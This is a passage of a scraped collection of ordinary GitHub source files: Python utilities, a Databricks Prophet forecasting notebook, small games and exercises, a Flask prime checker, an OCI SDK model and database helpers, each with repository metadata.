unittest.main()\n","repo_name":"artificialpixels/calibpy","sub_path":"tests/test_Camera.py","file_name":"test_Camera.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"72328002724","text":"\"\"\"Tensorboard utils.\n\"\"\"\n\nimport os\nimport glob\nfrom collections import defaultdict\nimport scipy.misc\n# try:\n# import tensorflow.compat.v1 as tf\n# tf.disable_v2_behavior()\n# except:\n# pass\nfrom tqdm import tqdm\n\n\ndef get_tensorboard_filename_from_folder(folder):\n # first get the event filename in the folder\n assert(os.path.isdir(folder))\n event_filenames = glob.glob(os.path.join(folder, \"events.out.tfevents.*\"))\n assert len(event_filenames) > 0\n event_filename = event_filenames[-1]\n return event_filename\n\n\ndef get_images_from_tensorboard_folder(folder, tag):\n \"\"\"Return the images that `tag` using the most recent tensorboard\n file in the `folder`.\n \"\"\"\n event_filename = get_tensorboard_filename_from_folder(folder)\n\n image_str = tf.placeholder(tf.string)\n im_tf = tf.image.decode_image(image_str)\n\n images = []\n sess = tf.InteractiveSession()\n with sess.as_default():\n count = 0\n for e in tqdm(tf.train.summary_iterator(event_filename)):\n for v in e.summary.value:\n if v.tag == tag:\n im = im_tf.eval({image_str: v.image.encoded_image_string})\n images.append(im)\n sess.close()\n return images\n\ndef get_values_from_tensorboard_folder(folder, tags):\n \"\"\"Return the images that `tag` using the most recent tensorboard\n file in the `folder`.\n - https://stackoverflow.com/questions/37304461/tensorflow-importing-data-from-a-tensorboard-tfevent-file\n \"\"\"\n event_filename = get_tensorboard_filename_from_folder(folder)\n\n values = defaultdict(list)\n for e in tf.train.summary_iterator(event_filename):\n for v in e.summary.value:\n if v.tag in tags:\n val = v.simple_value\n values[v.tag].append(val)\n values = dict(values)\n return values","repo_name":"ethanweber/goat","sub_path":"goat/tb_utils.py","file_name":"tb_utils.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"11125515707","text":"import pygame\nimport csv\n\nclass Menu():\n def __init__(self, gs, csvfile):\n self.gs = gs\n self.menu_words = []\n with open(csvfile) as f:\n data = csv.DictReader(f)\n for row in data:\n color = (int(row['R']), int(row['G']), int(row['B']))\n position = (int(row['X']), int(row['Y']))\n self.menu_words.append([row['word'],{'color':color, 'position':position}])\n self.myfont = pygame.font.SysFont(\"monospace\",50)\n\n def tick(self):\n for i in self.menu_words:\n label = self.myfont.render(i[0], 1, i[1][\"color\"])\n self.gs.screen.blit(label, i[1][\"position\"])\n","repo_name":"atowneND/paradigms","sub_path":"final_project/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3281166365","text":"# Databricks notebook source\n# MAGIC %run ./includes/includes\n\n# COMMAND ----------\n\n# Import Statements\n\nfrom datetime import datetime, timedelta\n# from fbprophet import Prophet\nimport logging\nimport holidays\nimport mlflow\n\n# Prophet Forecasting\nfrom prophet import Prophet, serialize\nfrom prophet.diagnostics import cross_validation, performance_metrics\n\n# Visualization\nimport plotly.express as px\n\n# Hyperparameter tuning\nimport itertools\n\n# Performance metrics\nfrom sklearn.metrics import mean_absolute_error\n\n# MLFlow Tracking\nfrom mlflow.tracking.client import MlflowClient\n\n# COMMAND ----------\n\n# Constants\n\nTIME_FORMAT = \"%Y-%m-%d %H:%M:%S\"\nHOURS_TO_FORECAST = 8\nMIN_HOURS_TO_FORECAST_IN_FUTURE = 4\nPAST_HOURS_TO_PREDICT = 168\nPERIOD_TO_FORECAST_FOR = PAST_HOURS_TO_PREDICT + HOURS_TO_FORECAST\nARTIFACT_PATH = GROUP_MODEL_NAME\nnp.random.seed(265)\n\n## Helper routine to extract the parameters that were used to train a specific instance of the model\ndef extract_params(pr_model):\n return {attr: getattr(pr_model, attr) for attr in serialize.SIMPLE_ATTRIBUTES}\n\n# COMMAND ----------\n\n# Read datasets\n\ninventory_info = spark.read.format(\"delta\").load(INVENTORY_INFO_DELTA_DIR).select(col(\"hour_window\").alias(\"ds\"), col(\"diff\").alias(\"y\"))\nweather_info = spark.read.format(\"delta\").load(WEATHER_INFO_DELTA_DIR).select(col(\"hour_window\").alias(\"ds\"), \"feels_like\", \"clouds\", \"is_weekend\")\nmerged_info = weather_info.join(inventory_info, on=\"ds\", how=\"left\")\n\ntry:\n model_info = spark.read.format(\"delta\").load(MODEL_INFO)\nexcept:\n model_info = None\n\n# COMMAND ----------\n\n# Get Split time based upon period to forecast\n\nlatest_end_timestamp_in_silver_storage = inventory_info.select(\"ds\").sort(desc(\"ds\")).head(1)[0][0]\ntime_for_split = (datetime.strptime(latest_end_timestamp_in_silver_storage, TIME_FORMAT) - timedelta(hours=PAST_HOURS_TO_PREDICT + MIN_HOURS_TO_FORECAST_IN_FUTURE)).strftime(TIME_FORMAT)\nlatest_timestamp_for_weather_data = (datetime.strptime(latest_end_timestamp_in_silver_storage, TIME_FORMAT) + timedelta(hours=HOURS_TO_FORECAST - MIN_HOURS_TO_FORECAST_IN_FUTURE)).strftime(TIME_FORMAT)\n\nmerged_info = merged_info.filter(col(\"ds\") <= latest_timestamp_for_weather_data)\n\n# COMMAND ----------\n\n# Create train-test data\n\ntrain_data = merged_info.filter(col(\"ds\") <= time_for_split).toPandas()\ntest_data = merged_info.filter(col(\"ds\") > time_for_split).toPandas()\nx_train, y_train, x_test, y_test = train_data[\"ds\"], train_data[\"y\"], test_data[\"ds\"], test_data[\"y\"]\n\n# COMMAND ----------\n\n# Suppresses `java_gateway` messages from Prophet as it runs.\n\nlogging.getLogger(\"py4j\").setLevel(logging.ERROR)\n\n# COMMAND ----------\n\nfig = px.line(train_data, x=\"ds\", y=\"y\", title='Bike Rides')\nfig.show()\n\n# COMMAND ----------\n\n#--------------------------------------------#\n# Automatic Hyperparameter Tuning\n#--------------------------------------------#\n\n# Set up parameter grid\nparam_grid = { \n 'changepoint_prior_scale': [0.01, 0.005],\n 'seasonality_prior_scale': [4, 8],\n 'seasonality_mode': ['additive'],\n 'yearly_seasonality' : [True],\n 'weekly_seasonality': [True],\n 'daily_seasonality': [True]\n}\n\n# Generate all combinations of parameters\nall_params = [dict(zip(param_grid.keys(), v)) for v in itertools.product(*param_grid.values())]\n\nprint(f\"Total training runs {len(all_params)}\")\n\n# Create a list to store MAPE values for each combination\nmaes = [] \n\n# Use cross validation to evaluate all parameters\nfor params in all_params:\n with mlflow.start_run(): \n # Fit a model using one parameter combination + holidays\n m = Prophet(**params) \n holidays = pd.DataFrame({\"ds\": [], \"holiday\": []})\n m.add_country_holidays(country_name='US')\n m.add_regressor('feels_like')\n m.add_regressor('clouds')\n m.add_regressor('is_weekend')\n m.fit(train_data)\n\n # Cross-validation\n # df_cv = cross_validation(model=m, initial='710 days', period='180 days', horizon = '365 days', parallel=\"threads\")\n # Model performance\n # df_p = performance_metrics(m, rolling_window=1)\n\n # try:\n # metric_keys = [\"mse\", \"rmse\", \"mae\", \"mape\", \"mdape\", \"smape\", \"coverage\"]\n # metrics = {k: df_p[k].mean() for k in metric_keys}\n # params = extract_params(m)\n # except:\n # pass\n\n # print(f\"Logged Metrics: \\n{json.dumps(metrics, indent=2)}\")\n # print(f\"Logged Params: \\n{json.dumps(params, indent=2)}\")\n\n y_pred = m.predict(test_data.dropna())\n\n mae = mean_absolute_error(y_test.dropna(), y_pred['yhat'])\n mlflow.prophet.log_model(m, artifact_path=ARTIFACT_PATH)\n mlflow.log_params(params)\n mlflow.log_metrics({'mae': mae})\n model_uri = mlflow.get_artifact_uri(ARTIFACT_PATH)\n print(f\"Model artifact logged to: {model_uri}\")\n\n # Save model performance metrics for this combination of hyper parameters\n maes.append((mae, model_uri))\n\n# COMMAND ----------\n\n# Tuning results\n\ntuning_results = pd.DataFrame(all_params)\ntuning_results['mae'] = list(zip(*maes))[0]\ntuning_results['model']= list(zip(*maes))[1]\n\nbest_params = dict(tuning_results.iloc[tuning_results[['mae']].idxmin().values[0]])\n\nbest_params\n\n# COMMAND ----------\n\n# Create Forecast\n\nloaded_model = mlflow.prophet.load_model(best_params['model'])\n\nforecast = loaded_model.predict(test_data)\n\nprint(f\"forecast:\\n${forecast.tail(40)}\")\n\n# COMMAND ----------\n\n# Plot forecast\n\nprophet_plot = loaded_model.plot(forecast)\n\n# COMMAND ----------\n\n# Plot each components of the forecast separately\n\nprophet_plot2 = loaded_model.plot_components(forecast)\n\n# COMMAND ----------\n\n# Finding residuals\ntest_data.ds = pd.to_datetime(test_data.ds)\nforecast.ds = pd.to_datetime(forecast.ds)\nresults = forecast[['ds','yhat']].merge(test_data,on=\"ds\")\nresults['residual'] = results['yhat'] - results['y']\n\n# COMMAND ----------\n\n# Plot the residuals\n\nfig = px.scatter(\n results, x='yhat', y='residual',\n marginal_y='violin',\n trendline='ols'\n)\nfig.show()\n\n# COMMAND ----------\n\n# Register Model to MLFlow\n\nmodel_details = mlflow.register_model(model_uri=best_params['model'], name=ARTIFACT_PATH)\n\n# COMMAND ----------\n\n# Call MLFlow Client\n\nclient = MlflowClient()\n\n# COMMAND ----------\n\n# Apply appropriate tag\n\ntry:\n latest_staging_mae = model_info.filter(col(\"tag\") == STAGING).select(\"mae\").head(1)[0][0]\nexcept:\n latest_staging_mae = 999\n\ncur_version = None\nif PROMOTE_MODEL:\n stage = PROD\n cur_version = client.get_latest_versions(ARTIFACT_PATH, stages=[PROD])\nelif best_params['mae'] < latest_staging_mae:\n stage = STAGING\n cur_version = client.get_latest_versions(ARTIFACT_PATH, stages=[STAGING])\nelse:\n stage = ARCHIVE\n\nif cur_version:\n client.transition_model_version_stage(\n name=GROUP_MODEL_NAME,\n version=cur_version[0].version,\n stage=ARCHIVE,\n )\n\nclient.transition_model_version_stage(\n name=model_details.name,\n version=model_details.version,\n stage=stage,\n)\n\n# COMMAND ----------\n\n# Current Model Stage\n\nmodel_version_details = client.get_model_version(\n\n name=model_details.name,\n\n version=model_details.version,\n\n)\n\nprint(\"The current model stage is: '{stage}'\".format(stage=model_version_details.current_stage))\n\n# COMMAND ----------\n\n# Update Gold Table\n\ndef get_forecast_df(results, tag, mae):\n df = results.copy()\n df['tag'] = tag\n df['mae'] = mae\n return df[['ds', 'y', 'yhat', 'tag', 'residual', 'mae']]\n\ntry:\n staging_data = model_info.filter(col(\"tag\") == STAGING)\n prod_data = model_info.filter(col(\"tag\") == PROD)\nexcept:\n staging_data = None\n prod_data = None\n\nforecast_df = pd.DataFrame(columns=['ds', 'y', 'yhat', 'tag', 'residual', 'mae'])\n\nfinal_df = None\nif PROMOTE_MODEL:\n forecast_df[['ds', 'y', 'yhat', 'tag', 'residual', 'mae']] = get_forecast_df(results, PROD, best_params['mae'])\n final_df = staging_data.union(spark.createDataFrame(forecast_df)) if staging_data else spark.createDataFrame(forecast_df)\nelif best_params['mae'] < latest_staging_mae:\n forecast_df[['ds', 'y', 'yhat', 'tag', 'residual', 'mae']] = get_forecast_df(results, STAGING, best_params['mae'])\n final_df = prod_data.union(spark.createDataFrame(forecast_df)) if prod_data else spark.createDataFrame(forecast_df)\nelse:\n pass\n\nif final_df:\n final_df\\\n .write\\\n .format(\"delta\")\\\n .option(\"path\", MODEL_INFO)\\\n .mode(\"overwrite\")\\\n .save()\n\n\n# COMMAND ----------\n\nimport json\n\n# Return Success\ndbutils.notebook.exit(json.dumps({\"exit_code\": \"OK\"}))\n","repo_name":"aradhyam2000/G05-final-project","sub_path":"final_project/03 mdl.py","file_name":"03 mdl.py","file_ext":"py","file_size_in_byte":8582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"13427754900","text":"import os\n\n\ndef singleton(class_):\n instances = {}\n\n def getinstance(*args, **kwargs):\n if class_ not in instances:\n instances[class_] = class_(*args, **kwargs)\n return instances[class_]\n\n return getinstance\n\n\ndef ensure_dir(output_dir: str):\n \"\"\"\n Checks whether all directories in exist and creates them if not.\n\n :param output_dir: desired directory\n \"\"\"\n if output_dir[0] == '/':\n current_dir = '/'\n\n else:\n current_dir = ''\n\n for s in output_dir.split('/'):\n current_dir += s\n\n if not os.path.isdir(current_dir):\n os.mkdir(current_dir)\n\n current_dir += '/'\n","repo_name":"michal-racko/corona-virus-slovakia","sub_path":"tools/general.py","file_name":"general.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"52"} +{"seq_id":"32543777311","text":"import time\nimport board\n\nimport displayio\nfrom adafruit_gizmo import tft_gizmo\nimport adafruit_imageload\nimport neopixel\n\nRED = (255, 0, 0)\n\n\nclass E2_Eye:\n def __init__(self):\n #\n # self.backlight = DigitalInOut(board.A3)\n # self.backlight.direction = OUTPUT\n # self.backlight.value = True\n\n # self.pixels = neopixel.NeoPixel(board.NEOPIXEL, 10, brightness=0.2, auto_write=False)\n # self.pixels.fill(RED)\n # self.pixels.show()\n\n # Create the TFT Gizmo display\n self.display = tft_gizmo.TFT_Gizmo()\n self.load_image(1)\n\n\n \"\"\"\n # Black background.\n color_bitmap = displayio.Bitmap(240, 240, 1)\n color_palette = displayio.Palette(1)\n color_palette[0] = 0x000000 # Black background\n self.bg_sprite = displayio.TileGrid(color_bitmap, pixel_shader=color_palette, x=0, y=0)\n self.splash.append(self.bg_sprite)\n\n # Draw iris\n iris_color = 0xFFc000 # 0xFFC000 is pretty close.\n iris = Circle(120, 120, 120, fill=iris_color, outline=iris_color)\n self.iris_sprite = displayio.TileGrid(iris.bitmap, pixel_shader=iris.pixel_shader, x=0, y=0)\n self.splash.append(self.iris_sprite)\n\n # Draw black pupil\n pupil = Circle(120, 120, 90, fill=0x000000, outline=0x000000)\n self.pupil_sprite = displayio.TileGrid(pupil.bitmap, pixel_shader=pupil.pixel_shader, x=30, y=30)\n self.splash.append(self.pupil_sprite)\n\n # Draw highlight\n highlight_color = 0xC09000\n highlight = Circle(10, 10, 20, fill=highlight_color, outline=highlight_color)\n # highlight_palette = displayio.Palette(2)\n # highlight_palette[0] = highlight_color\n # highlight_palette[1] = highlight_color\n\n self.highlight_sprite = displayio.TileGrid(highlight.bitmap, pixel_shader=highlight.pixel_shader, x=120, y=120)\n self.splash.append(self.highlight_sprite)\n \"\"\"\n\n self.update_interval = 3.0\n self.t = time.time()\n self.index = 0\n\n def load_image(self, n):\n filename = f\"images/image{n}.PNG\"\n\n # Make the display context\n self.main_group = displayio.Group(scale=2)\n\n\n image, palette = adafruit_imageload.load(\n filename, bitmap=displayio.Bitmap, palette=displayio.Palette\n )\n self.tile_grid = displayio.TileGrid(image, pixel_shader=palette,\n tile_width=120,\n tile_height=120)\n self.main_group.append(self.tile_grid)\n self.display.root_group = self.main_group\n\n\n def service(self):\n now = time.time()\n elapsed = now - self.t\n\n if elapsed >= self.update_interval:\n\n \n # switch the image\n self.index += 1\n if self.index >= 21:\n self.index = 0\n self.load_image(self.index)\n self.t = now\n\n\n \n \neye = E2_Eye()\n\nwhile True:\n eye.service()\n\n\n","repo_name":"dave20874/e2_eye","sub_path":"e2/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43477911763","text":"'''Faça um programa que tenha uma função chamada área(), que recebe as dimenssões de um terreno retangular (largura e\ncomprimento) e mostre a área do terreno'''\n\ndef area(larg, comp):\n a = larg * comp\n print(f'A Área de um terreno {larg:.2f}mX{comp:.2f} é de {a}m².')\n\n\n\n#Programa principal\nprint('Controle de Terrenos')\nprint('-' * 20)\n\nlargura = float(input('Informe a LARGURA (m): '))\ncomprimento = float(input('Informe o Comprimento (m): '))\narea(largura, comprimento)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"yannunes03/Projetos-Python-","sub_path":"Atividades diversas/Exercícios Resolvidos - Curso em Vídeo/07. Funções/Desafio 96.py","file_name":"Desafio 96.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39701864622","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2018/12/22 17:57\n# @Author : Python12_秋\n# @Email : 793630871@qq.com\n# @File : mysql.py\n# @Software : PyCharm\n# @Explain : MYsql数据量链接\n\"\"\"\n1.链接数据库\n2.编写sql\n3.建立游标\n4.执行\n\"\"\"\nfrom common import http_path\nfrom common.Http_config import Reading\nimport pymysql\nclass MysqlUtill:\n def __init__(self):\n #获取配置文件里面的MySQL配置\n config = Reading(http_path.config_path_control)\n host = config.get('MYSQL', 'Host_name')\n port = config.get_int('MYSQL', 'port') #port是一个数字,使用getint\n user = config.get('MYSQL', 'user')\n pwd = config.get('MYSQL', 'pwd')\n try:\n self.mysql = pymysql.connect(host=host, user=user, password=pwd,\n database='future',port=port,cursorclass=pymysql.cursors.DictCursor)\n #cursorclass=pymysql.cursors.DictCursor 返回字典格式\n except BaseException as e:\n print(\"数据库链接异常:{}\".format(e))\n raise e\n def get_fetch_one(self,sql):\n #查询一条数据并返回数据\n cursor = self.mysql.cursor() #建立游标\n cursor.execute(sql) #根据sql进行查询\n date = cursor.fetchone() #返回一条数据\n #max_phone = eval(phone[\"MobilePhone\"]) + 1 #字符串格式\n return date\n\n def get_fetch_all(self,sql):\n cursor = self.mysql.cursor() # 建立游标\n cursor.execute(sql) # 根据sql进行查询\n date = cursor.fetchall() # 返回多条数据,如获取用户列表,标列表等\n #max_phone = (phone[0]) + 1 # 返回的是元组嵌套格式\n return date\n\n def get_fetch_many(self,sql):\n cursor = self.mysql.cursor() # 建立游标\n cursor.execute(sql) # 根据sql进行查询\n date = cursor.fetchmany() # 指定返回多少条数据\n #max_phone = eval(phone[0]) + 1\n return date\n\n\nif __name__ == '__main__':\n sql = 'SELECT Id FROM financelog WHERE IncomeMemberId =(SELECT Id FROM member WHERE MobilePhone = 18999999653) ORDER BY Id DESC'\n print(sql)\n m = MysqlUtill().get_fetch_one(sql=sql) #结果是元组\n print(type(m),m)\n","repo_name":"9914/Python12-api-test_9913","sub_path":"common/mysql.py","file_name":"mysql.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29125874159","text":"# Term_Saving.py\n#\n# Term_Saving Class\n#\n# Yeonjae Kim A00967079 2A\n#\nfrom constant import *\nfrom saving import Saving\nimport datetime\nfrom datetime import date\n\n\nclass TermSaving(Saving):\n\n def __init__(self, name, balance=1000):\n super().__init__(name, balance)\n\n def withdraw(self, amount):\n self.negative_check(amount)\n history = {\"deposit\": 0, \"withdraw\": 0}\n\n file = self.transaction.get_transaction()\n for line in file:\n contents = line.split(\":\")\n year, month, day = contents[2].split(\"-\")\n if contents[0] == \"withdraw\":\n history[contents[0]] += float(contents[1])\n if contents[0] == \"deposit\" and date.today() - date(int(year), int(month), int(day)) > datetime.timedelta(60):\n history[contents[0]] += float(contents[1])\n if int(amount) <= history[\"deposit\"] - history[\"withdraw\"]:\n self._balance -= amount\n self.transaction.write_transaction(\"withdraw:\"+str(amount))\n else:\n print(\"Insufficient Funds\")\n\n def __repr__(self):\n return \"term saving\"\n\n\nif __name__ == \"__main__\":\n a = TermSaving(\"Jay\")\n print(a)\n # a.withdraw(1000.0)\n # a.withdraw(5000.0)\n # for nam, amo, da in a.get_transaction:\n # print(\"%-15s $%-15s @%-15s\" % (nam, amo, da))\n","repo_name":"Y-JayKim/pythonFinalProject","sub_path":"BankAccount/term_saving.py","file_name":"term_saving.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29807382971","text":"import argparse\nimport os\nimport cv2\n\nfrom scripts.data_converter.visual_utils import *\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\ndef kitti_visual_tool(data_root, demo_dir):\n if not os.path.exists(data_root):\n raise ValueError(\"data_root Not Found\")\n image_path = os.path.join(data_root, \"training/image_2\")\n calib_path = os.path.join(data_root, \"training/calib\")\n label_path = os.path.join(data_root, \"training/label_2\")\n image_ids = []\n for image_file in os.listdir(image_path):\n image_ids.append(image_file.split(\".\")[0])\n for i in range(len(image_ids)):\n if os.path.exists(os.path.join(image_path, str(image_ids[i]) + \".png\")):\n image_2_file = os.path.join(image_path, str(image_ids[i]) + \".png\")\n elif os.path.exists(os.path.join(image_path, str(image_ids[i]) + \".jpg\")):\n image_2_file = os.path.join(image_path, str(image_ids[i]) + \".jpg\")\n else:\n print(\"Error: image file not found.\")\n calib_file = os.path.join(calib_path, str(image_ids[i]) + \".txt\")\n label_2_file = os.path.join(label_path, str(image_ids[i]) + \".txt\")\n image = cv2.imread(image_2_file)\n _, P2, denorm = load_calib(calib_file)\n image = draw_3d_box_on_image(image, label_2_file, P2, denorm)\n cv2.imwrite(os.path.join(demo_dir, str(image_ids[i]) + \".jpg\"), image)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Dataset in KITTI format Checking ...\")\n parser.add_argument(\"--data_root\", type=str,\n default=\"\",\n help=\"Path to Dataset root in KITTI format\")\n parser.add_argument(\"--demo_dir\", type=str,\n default=\"\",\n help=\"Path to demo directions\")\n args = parser.parse_args()\n os.makedirs(args.demo_dir, exist_ok=True)\n kitti_visual_tool(args.data_root, args.demo_dir)","repo_name":"ADLab-AutoDrive/BEVHeight","sub_path":"scripts/data_converter/visual_tools.py","file_name":"visual_tools.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","stars":143,"dataset":"github-code","pt":"52"} +{"seq_id":"22896490339","text":"from __future__ import division\n\nfrom i2i.util import inject_method\n\n\nclass Py2i(object):\n def __init__(self, **obj_kwargs):\n for k, v in obj_kwargs.items():\n setattr(self, k, v)\n\n\ndef mk_python_binder_from_method_funcs(method_specs, obj=None):\n \"\"\"\n Inject the the methods specified by method_specs in the obj.\n Create a obj if not specified.\n If obj is a dict, use it as contructor arguments to create a Py2i binder_obj\n :param method_specs: A {method_name: method_func, ...} dict or a list of method_funcs.\n :param obj: An object to inject methods into or a dict specifying constructor arguments for a Py2i object.\n :return:\n \"\"\"\n if obj is None:\n obj = {}\n if isinstance(obj, dict):\n obj = Py2i(**obj)\n\n if not isinstance(method_specs, dict): # if not a dict assume it's a sequence of method_funcs\n # and make a {method_name: method_func, ...} dict from it\n method_specs = {method_func.__name__: method_func for method_func in method_specs}\n\n for method_name, method_func in method_specs.items():\n assert callable(method_func), \"Your method_func (values of method_specs) needs to be a callable\"\n inject_method(obj, method_func, method_name)\n\n return obj\n\n\n","repo_name":"thorwhalen/i2i","sub_path":"i2i/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"74398799525","text":"import uuid\nimport sys\n\ndef addguid(file):\n file_data = \"\"\n with open(file, \"r\", encoding=\"utf-8\") as f:\n for line in f:\n if 'Key=\"\"' in line:\n line = line.replace('Key=\"\"','Key=\"'+str(uuid.uuid4()).upper()+'\"')\n file_data += line\n with open(file,\"w\",encoding=\"utf-8\") as f:\n f.write(file_data)\n print (\"done!\")\n\nif __name__ =='__main__':\n addguid(sys.argv[1])","repo_name":"tryhear/info","sub_path":"bak/addguid.py","file_name":"addguid.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23213590407","text":"from docxtpl import DocxTemplate\n\n# Load template\ndoc = DocxTemplate(\"template.docx\")\n\ninvoice_list = [[5, \"packs of paper\", 0.5, 1.5],\n [1, \"box of pens\", 2.0, 2.0],\n [2, \"bottles of water\", 1.0, 2.0]]\n\n# Name automation\ndoc.render({\"name\": \"John Doe\",\n \"phone\": \"555-555-5555\",\n \"invoice_list\": invoice_list,\n \"subtotal\": 5.50,\n \"salestax\": \"8.25%\",\n \"total\": 6.0})\n \n\ndoc.save(\"new_invoice.docx\")\n\n","repo_name":"harrisonkleiman/InvoiceGenerator","sub_path":"doc_gen.py","file_name":"doc_gen.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40496017271","text":"from flask import Flask, jsonify\n\napp = Flask(__name__)\n\ndef onko_alkuluku(n):\n if n <= 1:\n return False\n if n <= 3:\n return True\n if n % 2 == 0 or n % 3 == 0:\n return False\n i = 5\n while i * i <= n:\n if n % i == 0 or n % (i + 2) == 0:\n return False\n i += 6\n return True\n\n@app.route('/alkuluku/', methods=['GET'])\ndef alkuluku(n):\n return jsonify({\"Number\": n, \"isPrime\": onko_alkuluku(n)})\n\nif __name__ == \"__main__\":\n app.run(port=3000)","repo_name":"AapoX/Python-Metropolia","sub_path":"mod13/t13-1.py","file_name":"t13-1.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31578677849","text":"from .import_inventory_details import ImportInventoryDetails\nfrom oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401\nfrom oci.decorators import init_model_state_from_kwargs\n\n\n@init_model_state_from_kwargs\nclass ImportInventoryViaAssetsDetails(ImportInventoryDetails):\n \"\"\"\n Details for importing assets from a file.\n \"\"\"\n\n #: A constant which can be used with the asset_type property of a ImportInventoryViaAssetsDetails.\n #: This constant has a value of \"VMWARE_VM\"\n ASSET_TYPE_VMWARE_VM = \"VMWARE_VM\"\n\n #: A constant which can be used with the asset_type property of a ImportInventoryViaAssetsDetails.\n #: This constant has a value of \"VM\"\n ASSET_TYPE_VM = \"VM\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Initializes a new ImportInventoryViaAssetsDetails object with values from keyword arguments. The default value of the :py:attr:`~oci.cloud_bridge.models.ImportInventoryViaAssetsDetails.resource_type` attribute\n of this class is ``ASSET`` and it should not be changed.\n The following keyword arguments are supported (corresponding to the getters/setters of this class):\n\n :param compartment_id:\n The value to assign to the compartment_id property of this ImportInventoryViaAssetsDetails.\n :type compartment_id: str\n\n :param resource_type:\n The value to assign to the resource_type property of this ImportInventoryViaAssetsDetails.\n Allowed values for this property are: \"ASSET\"\n :type resource_type: str\n\n :param freeform_tags:\n The value to assign to the freeform_tags property of this ImportInventoryViaAssetsDetails.\n :type freeform_tags: dict(str, str)\n\n :param defined_tags:\n The value to assign to the defined_tags property of this ImportInventoryViaAssetsDetails.\n :type defined_tags: dict(str, dict(str, object))\n\n :param data:\n The value to assign to the data property of this ImportInventoryViaAssetsDetails.\n :type data: str\n\n :param asset_type:\n The value to assign to the asset_type property of this ImportInventoryViaAssetsDetails.\n Allowed values for this property are: \"VMWARE_VM\", \"VM\"\n :type asset_type: str\n\n \"\"\"\n self.swagger_types = {\n 'compartment_id': 'str',\n 'resource_type': 'str',\n 'freeform_tags': 'dict(str, str)',\n 'defined_tags': 'dict(str, dict(str, object))',\n 'data': 'str',\n 'asset_type': 'str'\n }\n\n self.attribute_map = {\n 'compartment_id': 'compartmentId',\n 'resource_type': 'resourceType',\n 'freeform_tags': 'freeformTags',\n 'defined_tags': 'definedTags',\n 'data': 'data',\n 'asset_type': 'assetType'\n }\n\n self._compartment_id = None\n self._resource_type = None\n self._freeform_tags = None\n self._defined_tags = None\n self._data = None\n self._asset_type = None\n self._resource_type = 'ASSET'\n\n @property\n def data(self):\n \"\"\"\n Gets the data of this ImportInventoryViaAssetsDetails.\n The file body to be sent in the request.\n\n\n :return: The data of this ImportInventoryViaAssetsDetails.\n :rtype: str\n \"\"\"\n return self._data\n\n @data.setter\n def data(self, data):\n \"\"\"\n Sets the data of this ImportInventoryViaAssetsDetails.\n The file body to be sent in the request.\n\n\n :param data: The data of this ImportInventoryViaAssetsDetails.\n :type: str\n \"\"\"\n self._data = data\n\n @property\n def asset_type(self):\n \"\"\"\n Gets the asset_type of this ImportInventoryViaAssetsDetails.\n The type of asset.\n\n Allowed values for this property are: \"VMWARE_VM\", \"VM\"\n\n\n :return: The asset_type of this ImportInventoryViaAssetsDetails.\n :rtype: str\n \"\"\"\n return self._asset_type\n\n @asset_type.setter\n def asset_type(self, asset_type):\n \"\"\"\n Sets the asset_type of this ImportInventoryViaAssetsDetails.\n The type of asset.\n\n\n :param asset_type: The asset_type of this ImportInventoryViaAssetsDetails.\n :type: str\n \"\"\"\n allowed_values = [\"VMWARE_VM\", \"VM\"]\n if not value_allowed_none_or_none_sentinel(asset_type, allowed_values):\n raise ValueError(\n f\"Invalid value for `asset_type`, must be None or one of {allowed_values}\"\n )\n self._asset_type = asset_type\n\n def __repr__(self):\n return formatted_flat_dict(self)\n\n def __eq__(self, other):\n if other is None:\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n return not self == other\n","repo_name":"oracle/oci-python-sdk","sub_path":"src/oci/cloud_bridge/models/import_inventory_via_assets_details.py","file_name":"import_inventory_via_assets_details.py","file_ext":"py","file_size_in_byte":4905,"program_lang":"python","lang":"en","doc_type":"code","stars":345,"dataset":"github-code","pt":"52"} +{"seq_id":"41245399983","text":"import json\nimport psycopg2\nimport time\n\ndef cleanStr4SQL(s):\n return s.replace(\"'\",\"`\").replace(\"\\n\",\" \")\n\ndef int2BoolStr (value):\n if value == 0:\n return 'False'\n else:\n return 'True'\n\ntry:\n #conn = psycopg2.connect(\"dbname='test1' user='postgres' host='localhost' password='greatPassword'\")\n conn = psycopg2.connect(\"dbname='milestone2db' user='postgres' host='35.230.13.126' 